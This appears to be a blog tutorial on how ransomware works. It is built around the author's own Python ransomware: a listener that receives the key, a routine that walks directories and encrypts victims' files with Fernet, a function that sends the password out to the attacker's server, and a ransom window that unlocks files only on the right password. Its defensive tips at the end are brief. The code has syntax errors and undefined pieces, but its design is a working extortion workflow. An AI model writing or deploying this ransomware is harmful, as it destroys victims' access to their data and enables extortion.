What is Ransomware? How does it work?

Ransomware is malware designed to deny a user or organization access to files on their computer. By encrypting these files and demanding a ransom payment for the decryption key, cyberattackers place organizations in a position where paying the ransom is the easiest and cheapest way to regain access to their files. Some variants have added additional functionality – such as data theft – to provide further incentive for ransomware victims to pay the ransom.

Ransomware has quickly become the most prominent and visible type of malware. Recent ransomware attacks have impacted hospitals’ ability to provide vital services, crippled public services in cities, and caused significant damage to various organizations.

Since the arrival of?WannaCry Ransomware in 2017, the modern ransomware craze began. The attacks are multiplied and well-known ransoms are born. Today we are speaking about different families using various techniques in order to get the highest results one of the most known ransoms is:

1 - Ryuk is one of the most expensive types of ransomware that existed the average demand for Ryuk is over one million dollars.

2-?Maze is the first ransom that had the ability to combine encrypting files and data theft so if the victim did not pay the ransom Maze has already collected sensitive data before encrypting files so it will be made public in order to push the victim further and oblige it to pay the demands?

3- REvil it's actually the most known especially after the Russian-Ukrainian conflict REvil is another ransomware variant that targets large organizations. The ransomware group, which has been operated by the Russian-speaking REvil group since 2019, has been responsible for many big breaches such as ‘Kaseya‘ and ‘JBS’ It has competed with Ryuk over the last several years for the title of the most expensive ransomware variant.

After hearing a lot of stories it will be really interesting to understand the basic theory behind ransoms. To do that I am using in this article an upgraded version of the malware I created in the Workshop 'Malware Creation' of Spyro event organized by Engineers Spark FST and?Google Developer Community on Saturday 28-05-2022.

All these ransomware have the same operating steps :

Infection and Distribution Vectors:

Like any other kind of malware. Ransomware can have access in different ways the most known one is through phishing attacks. It's when the attacker is going to send an email to the victim with a malicious file or with a link to a malicious website, when the victim will click on the link the ransomware will be downloaded on the victim's device and start the second phase.?Another way is that the attacker will exploit a vulnerability to get remote access to the victim's device then he will download the ransomware directly.?

Before we move to the second phase let's try to understand the initialization we need to prepare so that our ransom will work. So, first of all, we need to create a server that will communicate with the ransomware to do so we will use the same techniques used to create the Reverse Shell server. This communication will be essential for us to receive the description key once generated.

So we are going to initialize the server by the following code if you want to understand this code in detail you can read my previous article Reverse Shell Theory.

	import socket

	server_ip ='0.0.0.0'
	server_port = 443
	data_size = 1024 * 500
	cyber = socket.socket()
	cyber.bind((server_ip,server_port))
	cyber.listen(10)
	client_socket,client_ip = cyber.accept()
	key=client_socket.recv(data_size).decode()
	print(key)        

Data Encryption

This is the most important part of Ransomware and the main goal of the attacker. The majority of the Ransoms are using AES encryption. AES or Advanced Encryption Standard is one of the most known symmetric block ciphers it's generally used by governments in order to encrypt sensitive data. AES was developed for the first time by the NIST(National Institute of Standards and Technology) in 1997 in order to replace the DES encryption that became vulnerable to brute force attacks. There are 3 types of AES algorithm (AES-128 - AES-192 - AES-256) 128, 192, and 256 is the length in bits of the used keys.

The government classifies information into three categories: Confidential, Secret, or Top Secret. The confidential and Secret data is encrypted by any type of the 3 Algorithms of AES but the TOP secret data should be encrypted using the AES-256 algorithm. The famous ransoms like WannaCry use a hybrid algorithm combining the AES-256 and RSA encryption this makes the reverse engineering process that will allow us to decrypt the data without knowing the keys will be hard and quite impossible. In this article, I will be using a similar but easier algorithm in order to make it easy to understand the theory behind ransoms. This is why I am going to generate my keys using the fernet algorithm which is a symmetric encryption algorithm that guarantees that a message encrypted using it cannot be manipulated or read without the key.

To create our educational purpose ransomware we are going to use the following libraries:

tkinter

The?tkinter?package (“Tk interface”) is the standard Python interface to the Tcl/Tk GUI toolkit. Both Tk and?tkinter?are available on most Unix platforms, including macOS, as well as on Windows systems

OS

This module provides a portable way of using operating system-dependent functionality.

cryptography.fernet

cryptography is a package that provides cryptographic recipes and primitives to Python developers.

String

Python String module contains some constants, utility functions, and classes for string manipulation.

socket

This module provides access to the BSD?socket?interface. It is available on all modern Unix systems, Windows, MacOS, and probably additional platforms.

    from tkinter import *
    import os
    from cryptography.fernet import Fernet
    import string
    import random
    import socket        

After importing all the packages we will use it will be essential for us to identify our location on the system and start walking all the directories and sub-directories in order to encrypt the files to do so I created this list of possible file extensions that we can encrypt (this is made to make sure that I will not lose my files during the test phase).

encrypted_ext=(".mp4",".py",".txt",".docx",".odt",".xlsx",".gif",".png",".jpeg",".pdf"
	

	victim_file=[]
	for root,dirs,files in os.walk('.'):
	    for file in files:
	        if (file =="cyber_ran.py"):
	            continue
	        else:
	            file_path,file_ext= os.path.splitext(root+'/'+file)
	            if file_ext in encrypted_ext:
	                victim_file.append(root+'/'+file))
encrypt(victim_file)        

What I did is that I created a void list in order to store in it the full paths of the files that we are going to encrypt. These files are found using the walk module of the os library also I made sure that the ransomware will not encrypt itself by the following condition if (file == "cyber_ran.py"): continue.

Now we have a full list of the files we wanna encrypt but we need the function that will actually encrypt our files. That's why I created the encrypt function that will take as input the list of the files we will encrypt which is victim_file:

def encrypt(victim_file)
	    key= Fernet.generate_key()
	    for loop in victim_file:
	        with open(loop,"rb") as file:
	            content= file.read()
	        content_enc= Fernet(key).encrypt(content)
	        with open(loop,"wb") as file:
	            file.write(content_enc)
	    password = password_gen()
	    cyber_send(password)
	    decrypt(password,key):        

we generated our encryption key using Fernet.generate_key then we will retrieve the content of the files using open(loop,"rb") as file : content = file.read after we got the content we are going to encrypt by the command Fernet(key).encrypt(content) and overwrite the files by the encrypted content. Finally, we will send the password to decrypt the files using the cyber_send(password) function and launch the ransom demand.

The cyber_send(password) function code is the following :

def cyber_send(password)
	    server_host = #server_IP
	    server_port = 443
	    data_size = 1024 * 128
	    SEPARATOR = "<sep>"
	    victim = socket.socket()
	    victim.connect((server_host,server_port))
	    victim.send(password.encode())
	    victim.close():        

obviously what we have done is that we connected to the server that we created at the beginning and after that, the connection was successful we send the password to the server and killed the communication directly after that.

Now the attack has encrypted the files and made sure that he has the key that the victim will need to decrypt and restore his files.

def decrypt(password,key)
	    def button_command(password,key):
	        key1=entry1.get()
	        i=0
	        if (key1 == password):
	            for loop in victim_file:
	                with open(loop,"rb") as file:
	                    content= file.read()
	                content_dec= Fernet(key).decrypt(content)
	                with open(loop,"wb") as file:
	                    file.write(content_dec)
	            print("good boy you did well!!")
	            quit()
	        else:
	             print("you are hacked!! don't play dump"):        

So what we did is that we created this window:

if the victim paid the ransom then he will receive the decryption key and the decryption process will start if not then he will receive this message 'you are hacked!! don't play dump'

How To Defend against Ransomware

I really believe that preparing is better than paying. The best way to defend against ransomware is:

1- Cyber Awareness we should make sure that our personnel is aware of cyber-attacks by training users on how to identify and avoid potential ransomware attacks that are targeting their email addresses and their social media accounts.

2- Make sure to have always an encrypted backup in special hardware that is not connected to the network. Backup is crucial in cyber attacks especially when it comes to ransomware that tries to encrypt our data.

3- Patching is one of the most important steps when it comes to securing our company. Making sure that all our software is patched is important because hackers usually are exploiting new vulnerabilities and the latest uncovered exploit this is why patching will help us reduce the possible access points that the hackers can use.

4- Conduct regular vulnerability scanning to identify and address vulnerabilities, especially those on internet-facing devices, to limit the attack surface.

5- having a functional Anti-Ransomware?Solution will help us to identify possible ransomware. How? Ransomware needs to encrypt the systems files which means it will have a unique fingerprint when running on the system that will allow the Anti-Ransomware solutions to identify the danger quickly and will include the ability to auto restore the data.

Used references : checkpoint cyber hub/ Ransomware encryption techniques by Tarcísio Marinho / techtarget / docs.python / cisa.gov

source : https://cybereagle2001.github.io/Blog/